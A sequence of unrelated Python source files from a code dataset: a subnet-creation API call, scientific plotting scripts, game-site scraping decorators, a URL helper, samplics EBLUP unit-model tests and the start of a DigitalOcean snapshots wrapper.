#   vpc_id: str (required)
#   total_ipv4_address_count: int (required)
#   zone: str (required)
def create_subnet(name, vpc_id, total_ipv4_address_count, zone):
    """POST a new subnet to the VPC API and return the raw JSON response body as a string.

    Args:
        name: Display name for the subnet.
        vpc_id: ID of the VPC the subnet belongs to.
        total_ipv4_address_count: Number of IPv4 addresses (pass an int; the
            API expects a JSON number).
        zone: Name of the zone the subnet is created in.
    """
    # Build the payload with json.dumps so values are properly quoted and
    # escaped; the previous f-string template produced invalid JSON for
    # values containing quotes and for non-numeric address counts.
    payload = json.dumps({
        "name": name,
        "vpc": {"id": vpc_id},
        "total_ipv4_address_count": total_ipv4_address_count,
        "zone": {"name": zone},
    })
    try:
        # Connect to api endpoint for subnets
        conn.request("POST", "/v1/subnets?version=" + version, payload, headers)
        # Get and read response data
        res = conn.getresponse()
        data = res.read()
        # Print and return response data
        print_json(data.decode("utf-8"))
        return data.decode("utf-8")
    # If an error happens while creating a subnet
    except Exception as error:
        print(f"Error creating subnet. {error}")
        raise
# Example invocations — replace the placeholder arguments with real values.
# NOTE(review): total_ipv4_address_count should be numeric; the string
# placeholder "IPV4_ADDRESS_COUNT" will not create a valid subnet.
fetch_subnets()
create_subnet("SUBNET_NAME", "VPC_ID", "IPV4_ADDRESS_COUNT", "ZONE")
| 2.859375 | 3 |
bayes_implicit_solvent/continuous_parameter_experiments/gd_vs_langevin/plot_rmses.py | openforcefield/bayes-implicit-solvent | 4 | 12760281 | from pickle import load
from bayes_implicit_solvent.continuous_parameter_experiments.gd_vs_langevin.autograd_based_experiment import Experiment, experiments, train_test_split, train_test_rmse, unreduce, expt_means
def load_expt_result(path):
    """Unpickle and return the experiment-result object stored at *path*."""
    with open(path, 'rb') as handle:
        return load(handle)
import matplotlib.pyplot as plt
import numpy as np
# Cached experimental dataset; `expt_means` holds the per-molecule mean values
# (presumably in reduced units — `unreduce` below converts to kcal/mol; confirm).
expt_dataset = np.load('expt_dataset.npz')
expt_means = expt_dataset['expt_means']
def rmse(predictions, inds):
    """Root-mean-square error (kcal/mol) between predictions and experiment at *inds*."""
    pred_kcal_mol = unreduce(predictions[inds])
    expt_kcal_mol = unreduce(expt_means[inds])
    squared_errors = (pred_kcal_mol - expt_kcal_mol) ** 2
    return np.sqrt(squared_errors.mean())
def train_test_rmse(predictions, split=0):
    """Return (train_rmse, test_rmse) for the given cross-validation split."""
    train_inds, test_inds = train_test_split(split)
    return rmse(predictions, train_inds), rmse(predictions, test_inds)
def compute_train_test_rmse_traj(prediction_traj, cv_fold=0):
    """Compute train/test RMSE for every prediction snapshot in *prediction_traj*.

    Args:
        prediction_traj: sequence of prediction arrays, one per optimizer iteration.
        cv_fold: cross-validation fold passed through to train_test_rmse.

    Returns:
        (train_rmses, test_rmses): two arrays with one entry per snapshot.
    """
    # Removed a leftover debug print of the trajectory's shape.
    n_snapshots = len(prediction_traj)
    train_rmses = np.zeros(n_snapshots)
    test_rmses = np.zeros(n_snapshots)
    for i, predictions in enumerate(prediction_traj):
        train_rmses[i], test_rmses[i] = train_test_rmse(predictions, cv_fold)
    return train_rmses, test_rmses
if __name__ == '__main__':
    plt.figure(figsize=(8, 4))
    train_color = 'blue'
    test_color = 'green'
    # Single-run sanity plot for one saved experiment result.
    result = load_expt_result('ll=student_t,k=1,hash(theta0)=9203586750394740867.pkl')
    train_rmses, test_rmses = compute_train_test_rmse_traj(result['prediction_traj'], result['experiment'].cv_fold)
    train_label = 'train'
    test_label = 'test'
    plt.plot(train_rmses, label=train_label, c=train_color, alpha=0.5)
    plt.plot(test_rmses, label=test_label, c=test_color, linestyle='--', alpha=0.5)
    plt.xlabel('iteration')
    plt.ylabel('RMSE (kcal/mol)')
    plt.savefig('train_test_rmses_0.png', dpi=300)
    plt.close()

    from glob import glob
    ll = 'gaussian'
    fnames = glob('july_26_results/ll={}*'.format(ll))

    def plot_scatter(path):
        """Scatter the initial predictions against experiment for one result file."""
        result = load_expt_result(path)
        initial_pred = result['prediction_traj'][0]
        pred_kcalmol = unreduce(initial_pred)
        expt_kcalmol = unreduce(expt_means)
        plt.figure()
        plt.scatter(pred_kcalmol, expt_kcalmol)
        plt.savefig('scatter.png', dpi=300)
        plt.close()

    plot_scatter(fnames[0])

    def plot_result(ax, ll='gaussian'):
        """Overlay train/test RMSE trajectories for every run with the given likelihood."""
        fnames = glob('july_27_28_results/ll={}*'.format(ll))
        for i, fname in enumerate(fnames):
            result = load_expt_result(fname)
            train_rmses, test_rmses = compute_train_test_rmse_traj(result['prediction_traj'], result['experiment'].cv_fold)
            # Only label the first pair of curves so the legend has one entry each.
            if i == 0:
                train_label = 'train'
                test_label = 'test'
            else:
                train_label = None
                test_label = None
            ax.plot(train_rmses, label=train_label, c=train_color, alpha=0.5)
            ax.plot(test_rmses, label=test_label, c=test_color, linestyle='--', alpha=0.5)
        ax.set_xlabel('iteration')
        ax.set_ylabel('RMSE (kcal/mol)')
        plt.legend(title='10-fold CV')

    # Side-by-side comparison of the two likelihood models.
    ax = plt.subplot(1, 2, 1)
    plot_result(ax, 'gaussian')
    plt.title('gaussian likelihood')
    ax1 = plt.subplot(1, 2, 2, sharey=ax)
    plot_result(ax1, 'student_t')
    plt.title('student-t likelihood')
    plt.tight_layout()
    plt.savefig('train_test_rmses.png', dpi=300, bbox_inches='tight')
    plt.close()
scripts_figures/plot_figure10c_&_t3.py | guadagar/Morphological_principles_of_neuronal_mitochondria | 0 | 12760282 | <filename>scripts_figures/plot_figure10c_&_t3.py
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
import csv
import pandas as pd
from scipy import stats
import matplotlib as mpl
from matplotlib.ticker import FormatStrFormatter,ScalarFormatter
from matplotlib.lines import Line2D
import matplotlib as mpl
from matplotlib import ticker
'''
This script reads the file data_last.csv, prints the values reported in
Table 3 of the paper, and generates Figure 10c.
GCG
07.13.21
'''
# Compact typography and figure-size settings for a small journal figure.
params = {'axes.labelsize': 6,
          'axes.titlesize': 6,
          'legend.fontsize': 5,
          'xtick.labelsize': 6,
          'ytick.labelsize': 6,
          'figure.figsize': (1.8, 1.8)}
mpl.rcParams.update(params)
# Per-mitochondrion columns accumulated from the CSV.
name = []
vom = []
flat = []
cat = []
sp = []
cyl = []
k1_80 = []
tot = []
scm = []
sf = []
cjs = []
s_ibm = []
cluster = []
som = []
sim = []
im_g = []

with open('data_last.csv', 'r') as csvfile:
    reader = csv.reader(csvfile, delimiter=',', quotechar='"')
    next(reader, None)  # skip the header row
    for row in reader:
        # Use the builtin float: np.float was deprecated in NumPy 1.20 and
        # removed in 1.24; it was only an alias of the builtin anyway, so
        # behavior is unchanged.
        name.append(row[0])
        vom.append(float(row[1]))
        som.append(float(row[2]))
        sim.append(float(row[4]))
        flat.append(float(row[16]))
        sp.append(float(row[17]))
        cat.append(float(row[18]))
        cyl.append(float(row[19]))
        k1_80.append(float(row[20]))
        tot.append(float(row[21]))
        # scm.append(float(row[21]))
        sf.append(float(row[14]))
        cjs.append(float(row[10]))
        s_ibm.append(float(row[5]))
        cluster.append(float(row[24]))
        im_g.append(float(row[15]))  # genus
# Convert the accumulated columns to NumPy arrays for vectorized selection.
af = np.array(flat)
asp = np.array(sp)
acat = np.array(cat)
acyl = np.array(cyl)
ak1 = np.array(k1_80)
atot = np.array(tot)
acjs = np.array(cjs)
asibm = np.array(s_ibm)
avom = np.array(vom)
asf = np.array(sf)
acl = np.array(cluster)
asom = np.array(som)
asim = np.array(sim)
aim_g = np.array(im_g)
namec = np.array(name)

# Split by cluster label, keeping only rows with nonzero flat area.
# Judging by the plot legend below, cluster 0 is plotted as 'Globular' and
# cluster 1 as 'Elongated' — confirm against the clustering step.
l_indices = (((acl == 0) & (af != 0))).nonzero()[0]
g_indices = (((acl == 1) & (af != 0))).nonzero()[0]

# Percentage of each surface class relative to the total classified area,
# computed separately for the two clusters (x*, x*a).
x1 = (100 * af[l_indices]) / atot[l_indices]
x1a = (100 * af[g_indices]) / atot[g_indices]
x2 = (100 * asp[l_indices]) / atot[l_indices]
x2a = (100 * asp[g_indices]) / atot[g_indices]
x3 = (100 * acat[l_indices]) / atot[l_indices]
x3a = (100 * acat[g_indices]) / atot[g_indices]
x4 = (100 * acyl[l_indices]) / atot[l_indices]
x4a = (100 * acyl[g_indices]) / atot[g_indices]
# High-curvature (k1 > 80 1/um) membrane area relative to the OM surface area.
x5 = (100 * ak1[l_indices]) / asom[l_indices]
x5a = (100 * ak1[g_indices]) / asom[g_indices]
x7 = (aim_g[l_indices])  # genus
x7a = (aim_g[g_indices])
# print('atot', atot[l_indices])
# Table 3 in the paper: per-class mean, SD (both clusters), and the
# Kolmogorov-Smirnov p-value comparing the two cluster distributions.
print('f', np.round(np.mean(x1), decimals=2), np.round(np.mean(x1a), decimals=2), np.round(np.std(x1), decimals=2), np.round(np.std(x1a), decimals=2), stats.ks_2samp(x1, x1a)[1])
print('cat', np.round(np.mean(x3), decimals=2), np.round(np.mean(x3a), decimals=2), np.round(np.std(x3), decimals=2), np.round(np.std(x3a), decimals=2), stats.ks_2samp(x3, x3a)[1])
print('cyl', np.round(np.mean(x4), decimals=2), np.round(np.mean(x4a), decimals=2), np.round(np.std(x4), decimals=2), np.round(np.std(x4a), decimals=2), stats.ks_2samp(x4, x4a)[1])
print('s', np.round(np.mean(x2), decimals=2), np.round(np.mean(x2a), decimals=2), np.round(np.std(x2), decimals=2), np.round(np.std(x2a), decimals=2), stats.ks_2samp(x2, x2a)[1])
print('k1', np.round(np.mean(x5), decimals=2), np.round(np.mean(x5a), decimals=2), np.round(np.std(x5), decimals=2), np.round(np.std(x5a), decimals=2), stats.ks_2samp(x5, x5a)[1])
# print('k1_sa/omvol', np.round(np.mean(x5), decimals=2), np.round(np.mean(x5a), decimals=2), np.round(np.std(x5), decimals=2), np.round(np.std(x5a), decimals=2), stats.ks_2samp(x5, x5a)[1])
# Figure 10c: high-curvature CM area fraction versus aspect ratio.
# (The original comment said "Figure 7"; the docstring and filename say 10c.)
fig, ax = plt.subplots(1, 1)
plt.ylim(0, 18)
plt.plot(asf[l_indices], x5, 'o', color='y', markersize='3')
plt.plot(asf[g_indices], x5a, 's', color='k', markersize='3')
# Proxy artists so the legend shows the two marker styles.
circ1 = Line2D([0], [0], linestyle="none", marker="o", markersize=3, markerfacecolor="y", mec='y')
circ2 = Line2D([0], [0], linestyle="none", marker="s", markersize=3, markerfacecolor="k", mec='k')
plt.legend((circ1, circ2), ("Globular", "Elongated"), numpoints=1, loc="upper right", frameon=True)
tick_spacing = 3
ax.yaxis.set_major_locator(ticker.MultipleLocator(tick_spacing))
plt.ylim(0, 18)
plt.xlim(1, 4.5)
plt.xlabel('Aspect ratio (L/D)')
plt.ylabel('CM SA with k1 > 80 $\mu m^{-1}$ / OM SA')
# plt.savefig('rat_sa_k1_sa_vs_ar.png', transparent=True, bbox_inches='tight', dpi=600)
# plt.legend()
plt.show()
websites/decorators.py | jb262/completewasteoftime | 6 | 12760283 | <reponame>jb262/completewasteoftime<filename>websites/decorators.py
'''
This module contains decorators and a parameter class for them.
'''
import re
import itertools
from bs4 import BeautifulSoup
from helper import helper
def gameinfodecorator(page):
    '''
    Decorator that validates a stored info-page response before running the
    wrapped data-retrieval function.

    The wrapper reads the response attribute named by *page* from the first
    positional argument. On HTTP 200 it parses the response body with
    BeautifulSoup and applies the wrapped function's extractor to the soup;
    otherwise it closes the response and raises.

    :param page: Name of the response attribute to validate and parse.
    :raise RuntimeError: If the stored request is None or did not succeed.
    '''
    def get_infodecorator(func):
        def wrapper(*args):
            response = getattr(args[0], page)
            # Guard clauses: missing request, then failed request.
            if not response:
                raise RuntimeError(f'No response from the {page.lower()} info request received.')
            if response.status_code != 200:
                response.close()
                raise RuntimeError(f'Cannot access {page.lower()} info page. The request failed with status code {response.status_code}')
            soup = BeautifulSoup(response.text, 'html.parser')
            return func(*args)(soup)
        return wrapper
    return get_infodecorator
def gamesearchdecorator(url):
    '''
    Decorator to perform the usual steps needed for searching a game, given the template of the
    website's search page url.

    :param url: The website's template search page url (format placeholders for
        base url, query, and page number).
    :raise RuntimeError: If the request for a search page fails, a RuntimeError will be raised,
        showing the status code of the failed request.
    '''
    def get_searchdecorator(func):
        def wrapper(*args, **kwargs):
            # Yield one parsed result set per search page, up to max_pages.
            for page in range(kwargs['max_pages']):
                # Collapse whitespace in the query into '+' separators for the URL.
                query = re.sub(r'\s', '+', kwargs['game'].strip())
                search_url = url.format(args[0].url, query, page)
                response = helper.get_response(search_url, args[0].headers)
                if response.status_code == 200:
                    bs = BeautifulSoup(response.text, 'html.parser')
                    yield func(*args, **kwargs)(bs)
                else:
                    response.close()
                    raise RuntimeError(f'Search failed with status code {response.status_code}')
        return wrapper
    return get_searchdecorator
def allgamesdecorator(console):
    '''
    Decorator to retrieve all games (including gamefaqs links) for a given console.

    Pages through the console's "all games" listing until a page yields no
    results, accumulating the wrapped function's output for each page.

    :param console: Platform for which all games should be retrieved.
    :raise RuntimeError: If a page request fails (with its status code), or if
        no games at all were found for the console.
    '''
    def get_allgamesdecorator(func):
        def wrapper(*args):
            collected = []
            page = 0
            while True:
                url = Parameters.GameFAQs.ALL_GAMES.format(
                    args[0].url, console, page)
                response = helper.get_response(url, args[0].headers)
                if response.status_code != 200:
                    response.close()
                    raise RuntimeError(f'Request failed with status code {response.status_code}.')
                soup = BeautifulSoup(response.text, 'html.parser')
                page_games = func(*args)(soup)
                if not page_games:
                    break
                collected += page_games
                page += 1
            if not collected:
                raise RuntimeError(f'No games for \'{console}\' found.')
            return collected
        return wrapper
    return get_allgamesdecorator
class Parameters:
    '''
    Parameter class holding the URL templates and attribute names the
    decorators above are parameterized with. These parameters are specific
    to a certain website.
    '''
    class GameFAQs:
        '''
        Parameters for GameFAQs.
        '''
        # Names of the response attributes read by gameinfodecorator.
        BASE = 'response_base'
        ADVANCED = 'response_advanced'
        QUESTIONS_ANSWERED = 'response_questions_answered'
        QUESTIONS_UNRESOLVED = 'response_questions_unresolved'
        ANSWERS = 'response_answers'
        # URL templates: placeholders are (base url, query/console, page number).
        SEARCH_URL = '{}/search?game={}&page={}'
        ALL_GAMES = '{}/{}/category/999-all?page={}'
    class Gamerankings:
        '''
        Parameters for Gamerankings.
        '''
        OVERVIEW = 'response_overview'
        SEARCH_URL = '{}/browse.html?search={}&numrev=3&page={}'
http/general.py | ZipluxLHS/ziplux | 0 | 12760284 | <gh_stars>0
class cURL:
    """Small helper for swapping out a slash-delimited segment range of a URL."""

    def __init__(self, url_='.'):
        # Stored URL operated on by replace(); defaults to '.'.
        self.url = url_

    def replace(self, replaceURL_, start_, end_):
        '''
        Replace the URL segments indexed by [start_, end_) with *replaceURL_*
        and return the rewritten URL (self.url is left untouched).

        Segment indexing convention, e.g. for 'https://www.google.com/search':
            -1 -> 'https://'
             0 -> 'www.google.com'
             1 -> 'search'
        '''
        # Map the user-facing indices onto str.split('/') positions, where
        # 'https://x/y'.split('/') == ['https:', '', 'x', 'y'].
        if start_ == -1:
            lo = 0
        else:
            lo = start_ + 2
            end_ = end_ + 2
        segments = self.url.split('/')
        target = '/'.join(segments[lo:end_])
        return self.url.replace(target, replaceURL_)
tests/sae/test_eblup_unit_model.py | samplics-org/samplics | 14 | 12760285 | import numpy as np
import pandas as pd
from samplics.sae.eblup_unit_model import EblupUnitModel
# Unit-level corn/soybean survey data and the corresponding area-level means
# of the auxiliary (pixel-count) variables.
cornsoybean = pd.read_csv("./tests/sae/cornsoybean.csv")
cornsoybean_mean = pd.read_csv("./tests/sae/cornsoybeanmeans.csv")
cornsoybean = cornsoybean.sample(frac=1)  # shuffle the data to remove the original row ordering
# print(cornsoybean)
areas = cornsoybean["County"]  # area (county) identifier per sample unit
areas_list = np.unique(areas)
ys = cornsoybean["CornHec"]  # response: corn hectares
Xs = cornsoybean[["CornPix", "SoyBeansPix"]]  # unit-level auxiliary variables
Xmean = cornsoybean_mean[["MeanCornPixPerSeg", "MeanSoyBeansPixPerSeg"]]
# print(Xmean)
samp_size = np.array([1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 5, 6])  # per-area sample sizes
pop_size = np.array([545, 566, 394, 424, 564, 570, 402, 567, 687, 569, 965, 556])  # per-area population sizes
"""REML Method"""
eblup_bhf_reml = EblupUnitModel()
eblup_bhf_reml.fit(
ys,
Xs,
areas,
)
eblup_bhf_reml.predict(Xmean, areas_list)
def test_eblup_bhf_reml():
    """The fitting method is reported as REML."""
    assert eblup_bhf_reml.method == "REML"
def test_fixed_effects_bhf_reml():
    """Fixed-effect coefficients match the reference values."""
    assert np.isclose(
        eblup_bhf_reml.fixed_effects,
        np.array([17.96398, 0.3663352, -0.0303638]),
        atol=1e-6,
    ).all()
def test_fe_std_bhf_reml():
    """Fixed-effect standard errors match the reference values."""
    assert np.isclose(
        eblup_bhf_reml.fe_std,
        np.array([30.986801, 0.065101, 0.067583]),
        atol=1e-6,
    ).all()
def test_gamma_bhf_reml():
    """Per-area shrinkage factors (gamma) match the reference values."""
    assert np.isclose(
        np.array(list(eblup_bhf_reml.gamma.values())),
        np.array(
            [
                0.17537405,
                0.17537405,
                0.17537405,
                0.29841402,
                0.38950426,
                0.38950426,
                0.38950426,
                0.38950426,
                0.45965927,
                0.51535245,
                0.51535245,
                0.56063774,
            ]
        ),
        atol=1e-6,
    ).all()
def test_random_effects_bhf_reml():
    """Predicted per-area random effects match the reference values."""
    assert np.isclose(
        eblup_bhf_reml.random_effects,
        np.array(
            [
                2.184574,
                1.475118,
                -4.730863,
                -2.764825,
                8.370915,
                4.274827,
                -2.705540,
                1.156682,
                5.026852,
                -2.883398,
                -8.652532,
                -0.751808,
            ]
        ),
        atol=1e-6,
    ).all()
def test_re_std_bhf_reml():
    """Random-effect variance matches the reference value."""
    assert np.isclose(eblup_bhf_reml.re_std ** 2, 63.3149, atol=1e-6)
def test_error_var_bhf_reml():
    """Unit-level error variance matches the reference value."""
    assert np.isclose(eblup_bhf_reml.error_std ** 2, 297.7128, atol=1e-6)
def test_goodness_of_fit_bhf_reml():
    """Log-likelihood, AIC and BIC match the reference values."""
    assert np.isclose(eblup_bhf_reml.goodness["loglike"], -161.005759)
    assert np.isclose(eblup_bhf_reml.goodness["AIC"], 326.011518)
    assert np.isclose(eblup_bhf_reml.goodness["BIC"], 329.064239)
def test_convergence_bhf_reml():
    """The REML fit converged, in the expected number of iterations."""
    # Truthiness instead of `== True` (PEP 8 / flake8 E712); also robust to
    # numpy bool types.
    assert eblup_bhf_reml.convergence["achieved"]
    assert eblup_bhf_reml.convergence["iterations"] == 4
def test_area_estimate_bhf_reml():
    """EBLUP area estimates match the reference values."""
    assert np.isclose(
        np.array(list(eblup_bhf_reml.area_est.values())),
        np.array(
            [
                122.56367092,
                123.51515946,
                113.09071900,
                115.02074400,
                137.19621212,
                108.94543201,
                116.51553231,
                122.76148230,
                111.53048000,
                124.18034553,
                112.50472697,
                131.25788283,
            ]
        ),
        atol=1e-6,
    ).all()
# @pytest.mark.skip(reason="to be fixed")
def test_area_mse_bhf_reml():
    """Taylor-linearization MSE estimates match the reference values."""
    assert np.isclose(
        np.array(list(eblup_bhf_reml.area_mse.values())),
        np.array(
            [
                85.495399459,
                85.648949504,
                85.004705566,
                83.235995880,
                72.017014455,
                73.356967955,
                72.007536645,
                73.580035237,
                65.299062174,
                58.426265442,
                57.518251822,
                53.876770532,
            ]
        ),
        atol=1e-6,
    ).all()
# Same REML fit, but prediction includes the finite population correction
# via the per-area population sizes.
eblup_bhf_reml_fpc = EblupUnitModel()
eblup_bhf_reml_fpc.fit(ys, Xs, areas)
eblup_bhf_reml_fpc.predict(Xmean, areas_list, pop_size)
def test_y_predicted_bhf_reml_fpc():
    """Area estimates with finite population correction match the reference values."""
    assert np.isclose(
        np.array(list(eblup_bhf_reml_fpc.area_est.values())),
        np.array(
            [
                122.582519,
                123.527414,
                113.034260,
                114.990082,
                137.266001,
                108.980696,
                116.483886,
                122.771075,
                111.564754,
                124.156518,
                112.462566,
                131.251525,
            ]
        ),
        atol=1e-6,
    ).all()
def test_bhf_reml_to_dataframe_default():
    """to_dataframe() yields the default four columns."""
    df = eblup_bhf_reml.to_dataframe()
    assert df.shape[1] == 4
    assert (df.columns == ["_parameter", "_area", "_estimate", "_mse"]).all()
def test_bhf_reml_to_dataframe_not_default():
    """to_dataframe() honors user-supplied column names."""
    df = eblup_bhf_reml.to_dataframe(
        col_names=["parameter", "small_area", "modelled_estimate", "taylor_mse"]
    )
    assert df.shape[1] == 4
    assert (df.columns == ["parameter", "small_area", "modelled_estimate", "taylor_mse"]).all()
# Bootstrap with REML: re-fit, predict, and add bootstrap MSE estimates
# (few replicates — this only exercises the code path, not accuracy).
eblup_bhf_reml_boot = EblupUnitModel()
eblup_bhf_reml_boot.fit(
    ys,
    Xs,
    areas,
)
eblup_bhf_reml_boot.predict(Xmean, areas_list)
eblup_bhf_reml_boot.bootstrap_mse(number_reps=5, show_progress=False)

df1_reml = eblup_bhf_reml_boot.to_dataframe()
def test_bhf_reml_to_dataframe_boot_default():
    """After bootstrap_mse(), the dataframe gains a fifth (_mse_boot) column."""
    assert df1_reml.shape[1] == 5
    assert (df1_reml.columns == ["_parameter", "_area", "_estimate", "_mse", "_mse_boot"]).all()
# Same dataframe with custom column names (checked in the next test).
df2_reml = eblup_bhf_reml_boot.to_dataframe(
    col_names=["parameter", "small_area", "modelled_estimate", "taylor_mse", "boot_mse"]
)
def test_bhf_reml_to_dataframe_boot_not_default():
    """Custom column names are honored for the bootstrap dataframe."""
    assert df2_reml.shape[1] == 5
    assert (
        df2_reml.columns
        == ["parameter", "small_area", "modelled_estimate", "taylor_mse", "boot_mse"]
    ).all()
# Shorter output: predict for only a subset of areas (7 of the 12).
np.random.seed(123)
samp_size_short = np.array([3, 3, 3, 4, 5, 5, 6])
pop_size_short = np.array([570, 402, 567, 687, 569, 965, 556])
pop_area_short = np.linspace(6, 12, 7).astype(int)
Xp_mean_short = Xmean.loc[5:12, :]

eblup_bhf_reml_short = EblupUnitModel()
eblup_bhf_reml_short.fit(ys, Xs, areas, intercept=True)
eblup_bhf_reml_short.predict(Xp_mean_short, pop_area_short, pop_size_short)
def test_area_estimate_bhf_reml_short():
    """Subset-of-areas estimates match the reference values."""
    assert np.isclose(
        np.array(list(eblup_bhf_reml_short.area_est.values())),
        np.array(
            [
                108.98069631,
                116.48388625,
                122.77107460,
                111.56475375,
                124.15651773,
                112.46256629,
                131.25152478,
            ]
        ),
        atol=1e-6,
    ).all()
# @pytest.mark.skip(reason="to be fixed")
def test_area_mse_bhf_reml_short():
    """Subset-of-areas MSE estimates match the reference values."""
    assert np.isclose(
        np.array(list(eblup_bhf_reml_short.area_mse.values())),
        np.array(
            [
                78.70883983,
                78.02323786,
                78.87309307,
                70.04040931,
                64.11261351,
                61.87654547,
                59.81982861,
            ]
        ),
        atol=1e-6,
    ).all()
"""ML Method"""
eblup_bhf_ml = EblupUnitModel(method="ml")
eblup_bhf_ml.fit(ys, Xs, areas)
eblup_bhf_ml.predict(Xmean, areas_list)
def test_eblup_bhf_ml():
    """The fitting method is reported (normalized) as ML."""
    assert eblup_bhf_ml.method == "ML"
def test_fixed_effects_bhf_ml():
    """ML fixed-effect coefficients match the reference values."""
    assert np.isclose(
        eblup_bhf_ml.fixed_effects,
        np.array([18.08888, 0.36566, -0.03017]),
        atol=1e-5,
    ).all()
def test_fe_std_bhf_ml():
    """ML fixed-effect standard errors match the reference values."""
    assert np.isclose(
        eblup_bhf_ml.fe_std,
        np.array([29.82724469, 0.06262676, 0.06506189]),
        atol=1e-5,
    ).all()
def test_gamma_bhf_ml():
    """ML per-area shrinkage factors match the reference values."""
    assert np.isclose(
        np.array(list(eblup_bhf_ml.gamma.values())),
        np.array(
            [
                0.14570573,
                0.14570573,
                0.14570573,
                0.25435106,
                0.33848019,
                0.33848019,
                0.33848019,
                0.33848019,
                0.40555003,
                0.46027174,
                0.46027174,
                0.50576795,
            ]
        ),
        atol=1e-6,
    ).all()
def test_random_effects_bhf_ml():
    """ML per-area random effects match the reference values."""
    assert np.isclose(
        eblup_bhf_ml.random_effects,
        np.array(
            [
                1.8322323,
                1.2218437,
                -3.9308431,
                -2.3261989,
                7.2988558,
                3.7065346,
                -2.3371090,
                1.0315879,
                4.4367420,
                -2.5647926,
                -7.7046350,
                -0.6642178,
            ]
        ),
        atol=1e-6,
    ).all()
def test_re_std_bhf_ml():
    """Random-effect variance (std squared) matches the published ML estimate."""
    observed_variance = eblup_bhf_ml.re_std ** 2
    assert np.isclose(observed_variance, 47.79559, atol=1e-4)
def test_error_var_bhf_ml():
    """Residual error variance (std squared) matches the published ML estimate."""
    observed_variance = eblup_bhf_ml.error_std ** 2
    assert np.isclose(observed_variance, 280.2311, atol=1e-4)
def test_goodness_of_fit_bhf_ml():
    """Log-likelihood and information criteria for the ML fit."""
    goodness = eblup_bhf_ml.goodness
    assert np.isclose(goodness["loglike"], -159.1981)
    assert np.isclose(goodness["AIC"], 328.4, atol=0.1)
    assert np.isclose(goodness["BIC"], 336.5, atol=0.1)
def test_convergence_bhf_ml():
    """The ML optimiser converged, and in the expected number of iterations."""
    # Idiom fix: assert truthiness directly instead of comparing '== True'
    # (flake8 E712); also works for numpy bools.
    assert eblup_bhf_ml.convergence["achieved"]
    assert eblup_bhf_ml.convergence["iterations"] == 3
def test_area_estimate_bhf_ml():
    """ML area estimates over the full domain."""
    expected = np.array([
        122.17284832, 123.22129485, 113.85918468, 115.42994973,
        136.06978025, 108.37573030, 116.84704244, 122.60003878,
        110.93542654, 124.44934607, 113.41480260, 131.28369873,
    ])
    observed = np.array(list(eblup_bhf_ml.area_est.values()))
    assert np.allclose(observed, expected, atol=1e-6)
def test_area_mse_bhf_ml():
    """ML Taylor MSE values over the full domain."""
    expected = np.array([
        70.03789330, 70.14078955, 69.75891524, 71.50874622,
        64.73862949, 66.13552266, 64.77099780, 66.09246929,
        60.71287515, 55.31330901, 54.52024143, 51.85801645,
    ])
    observed = np.array(list(eblup_bhf_ml.area_mse.values()))
    assert np.allclose(observed, expected, atol=1e-4)
# Re-fit by ML and predict with population sizes supplied, which applies the
# finite population correction (fpc).
eblup_bhf_ml_fpc = EblupUnitModel(method="ML")
eblup_bhf_ml_fpc.fit(ys, Xs, areas)
eblup_bhf_ml_fpc.predict(Xmean, areas_list, pop_size)
def test_area_est_bhf_ml_fpc():
    """ML area estimates with the finite population correction applied."""
    expected = np.array([
        122.1926, 123.2340, 113.8007, 115.3978,
        136.1457, 108.4139, 116.8129, 122.6107,
        110.9733, 124.4229, 113.3680, 131.2767,
    ])
    observed = np.array(list(eblup_bhf_ml_fpc.area_est.values()))
    assert np.allclose(observed, expected, atol=1e-4)
# Bootstrap with ML
eblup_bhf_ml_boot = EblupUnitModel(method="ML")
eblup_bhf_ml_boot.fit(
    ys,
    Xs,
    areas,
)
eblup_bhf_ml_boot.predict(Xmean, areas_list)
# A very small number of replicates keeps the test fast; the progress bar is
# disabled for non-interactive runs.
eblup_bhf_ml_boot.bootstrap_mse(number_reps=5, show_progress=False)
df1_ml = eblup_bhf_ml_boot.to_dataframe()
def test_bhf_ml_to_dataframe_boot_default():
    """to_dataframe() exposes the default columns, including the bootstrap MSE."""
    default_columns = ["_parameter", "_area", "_estimate", "_mse", "_mse_boot"]
    assert df1_ml.shape[1] == 5
    assert (df1_ml.columns == default_columns).all()
# Same dataframe but with user-supplied column names.
df2_ml = eblup_bhf_ml_boot.to_dataframe(
    col_names=["parameter", "small_area", "modelled_estimate", "taylor_mse", "boot_mse"]
)
def test_bhf_ml_to_dataframe_boot_not_default():
    """to_dataframe() honours caller-supplied column names."""
    custom_columns = ["parameter", "small_area", "modelled_estimate", "taylor_mse", "boot_mse"]
    assert df2_ml.shape[1] == 5
    assert (df2_ml.columns == custom_columns).all()
# Shorter output
# Fit by ML and predict on the reduced seven-area domain.
eblup_bhf_ml_short = EblupUnitModel(method="ML")
eblup_bhf_ml_short.fit(ys, Xs, areas, intercept=True)
eblup_bhf_ml_short.predict(Xp_mean_short, pop_area_short, pop_size_short)
def test_area_estimate_bhf_ml_short():
    """ML area estimates on the short prediction domain."""
    expected = np.array([
        108.41385641, 116.81295596, 122.61070603, 110.97329145,
        124.42291775, 113.36799091, 131.27669442,
    ])
    observed = np.array(list(eblup_bhf_ml_short.area_est.values()))
    assert np.allclose(observed, expected, atol=1e-6)
# @pytest.mark.skip(reason="to be fixed")
def test_area_mse_bhf_ml_short():
    """ML Taylor MSE values on the short prediction domain."""
    expected = np.array([
        71.07422316, 70.52276075, 71.03548298, 65.27922762,
        60.93670432, 58.91938558, 57.87424555,
    ])
    observed = np.array(list(eblup_bhf_ml_short.area_mse.values()))
    assert np.allclose(observed, expected, atol=1e-6)
| 2.578125 | 3 |
cloudapi_digitalocean/digitaloceanapi/snapshots.py | zorani/cloudapi_digitalocean | 4 | 12760286 | from .digitaloceanapiconnection import DigitalOceanAPIConnection
import os
import time
import queue
import threading
import datetime
import random
import json
class Snapshots(DigitalOceanAPIConnection):
    """Wrapper around the DigitalOcean ``/v2/snapshots`` API endpoints."""

    def __init__(self):
        DigitalOceanAPIConnection.__init__(self)
        self.endpoint = "/v2/snapshots"

    def _list_snapshots(self, params):
        """Issue the listing GET request with the given query parameters.

        params must be set from a dictionary, not a json dump.
        """
        return self.get_request(self.endpoint, headers=self.headers, params=params)

    def list_all_snapshots(self, page=0, per_page=0):
        """List every snapshot on the account."""
        return self._list_snapshots({"page": page, "per_page": per_page})

    def list_all_droplet_snapshots(self, page=0, per_page=0):
        """List snapshots taken of droplets."""
        return self._list_snapshots(
            {"page": page, "per_page": per_page, "resource_type": "droplet"}
        )

    def list_all_volume_snapshots(self, page=None, per_page=None):
